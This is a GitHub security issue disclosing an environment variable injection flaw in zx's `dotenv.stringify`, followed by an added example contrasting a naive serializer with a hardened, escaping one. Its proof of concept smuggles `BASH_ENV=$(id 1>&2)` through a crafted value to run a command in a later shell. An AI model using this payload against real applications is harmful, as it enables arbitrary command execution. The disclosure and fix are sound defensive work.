Closed
Description
I found a vulnerability in the env API introduced in version 8.3.1. This issue is the security report.
Note:
I reported it to https://g.co/vulnz according to SECURITY.md. Because the Google Security Team said "Please feel free to publicly disclose this issue on GitHub as a public issue.", I made this issue.
Summary
google/zx has an Environment Variable Injection vulnerability in `dotenv.stringify`.

If users can control the values of an env object, the application may allow a malicious user to inject environment variables into `process.env`.
Details
`dotenv.stringify` uses `formatValue`:

If the environment value includes `"`, `'`, and `` ` ``, the function improperly formats the value.
PoC
Tested in version `zx@8.3.1` (latest)
```js
import { $, dotenv, fs } from "zx";
import assert from "node:assert/strict";

const lang = "en_US\"'`\nBASH_ENV=$(id 1>&2)\nx=`"; // user-controllable
const env = {
  LANG: lang,
};

await fs.writeFile(".env", dotenv.stringify(env));
dotenv.config(".env");

// `BASH_ENV` variable is injected.
assert.equal(process.env.BASH_ENV, "$(id 1>&2)");

await $`echo hello`;
// -> uid=0(root) gid=0(root) groups=0(root)
```
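The root cause described in Details is that a value containing quote characters and a newline is written out as more than one `KEY=value` line, so whatever reads the file back sees extra variables. The following is an added example, not code from the zx project or from this report: a toy unescaped serializer paired with a permissive line-oriented reader (standing in for any `.env` parser, not zx's own `dotenv`) shows how the extra keys appear, and a hardened serializer beside it quotes every value and escapes `\`, `"`, `\n` and `\r` so the value always occupies exactly one line and round-trips through a strict reader unchanged. All function names here (`naiveStringify`, `naiveParse`, `safeStringify`, `safeParse`, `injectedKeys`) are chosen for this example and are not zx APIs.

```javascript
// Added example (not zx's implementation). Demonstrates why unescaped
// env values let a newline smuggle in extra KEY=value pairs, and one
// way to serialize values so that cannot happen.

// --- vulnerable path: value is written verbatim ----------------------

function naiveStringify(env) {
  return Object.entries(env).map(([k, v]) => `${k}=${v}`).join("\n") + "\n";
}

// Permissive toy reader: each non-empty line is split at the first '='.
// Stands in for any line-oriented .env parser; not zx's dotenv.
function naiveParse(text) {
  const env = {};
  for (const line of text.split("\n")) {
    const i = line.indexOf("=");
    if (i < 0) continue;
    env[line.slice(0, i)] = line.slice(i + 1);
  }
  return env;
}

// --- hardened path: keys validated, values quoted and escaped --------

// Only shell-identifier keys are accepted, so a key can never carry a
// newline or '=' of its own.
const KEY_RE = /^[A-Za-z_][A-Za-z0-9_]*$/;

function escapeValue(value) {
  return value
    .replace(/\\/g, "\\\\") // backslash first, so later escapes are not doubled
    .replace(/"/g, '\\"')
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r");
}

function safeStringify(env) {
  const lines = [];
  for (const [key, value] of Object.entries(env)) {
    if (!KEY_RE.test(key)) throw new Error(`invalid env key: ${JSON.stringify(key)}`);
    // Always double-quote; quotes, backslashes and line breaks inside the
    // value are escaped, so the pair is guaranteed to be a single line.
    lines.push(`${key}="${escapeValue(String(value))}"`);
  }
  return lines.join("\n") + "\n";
}

function unescapeValue(body) {
  let out = "";
  for (let i = 0; i < body.length; i++) {
    const c = body[i];
    if (c !== "\\") { out += c; continue; }
    const n = body[++i];
    if (n === "n") out += "\n";
    else if (n === "r") out += "\r";
    else if (n === '"' || n === "\\") out += n;
    else throw new Error(`bad escape \\${n}`);
  }
  return out;
}

// Strict reader matching safeStringify: one KEY="escaped" pair per line,
// anything else is rejected rather than guessed at.
function safeParse(text) {
  const env = {};
  for (const line of text.split("\n")) {
    if (line.trim() === "") continue;
    const m = /^([A-Za-z_][A-Za-z0-9_]*)="((?:[^"\\]|\\.)*)"$/.exec(line);
    if (!m) throw new Error(`malformed line: ${JSON.stringify(line)}`);
    env[m[1]] = unescapeValue(m[2]);
  }
  return env;
}

// Names present after a write/read round trip that were not in the
// original object, i.e. variables the serializer let the value inject.
function injectedKeys(original, parsed) {
  return Object.keys(parsed).filter((k) => !(k in original));
}

// Constructed input with the same shape as the report's payload: all
// three quote characters plus newlines carrying a second KEY=value pair.
const hostile = { LANG: "en_US\"'`\nBASH_ENV=$(id 1>&2)\nx=`" };

console.log("naive :", injectedKeys(hostile, naiveParse(naiveStringify(hostile))));
console.log("safe  :", injectedKeys(hostile, safeParse(safeStringify(hostile))));
```

With the naive pair the round trip reports `BASH_ENV` and `x` as injected; with the hardened pair no extra key appears and `LANG` comes back byte-for-byte equal to the input. The same idea applies whichever parser ultimately reads the file: a serializer must either escape line breaks and quotes in values or refuse values that contain them, and a reader should reject lines it cannot parse unambiguously instead of treating them as new assignments.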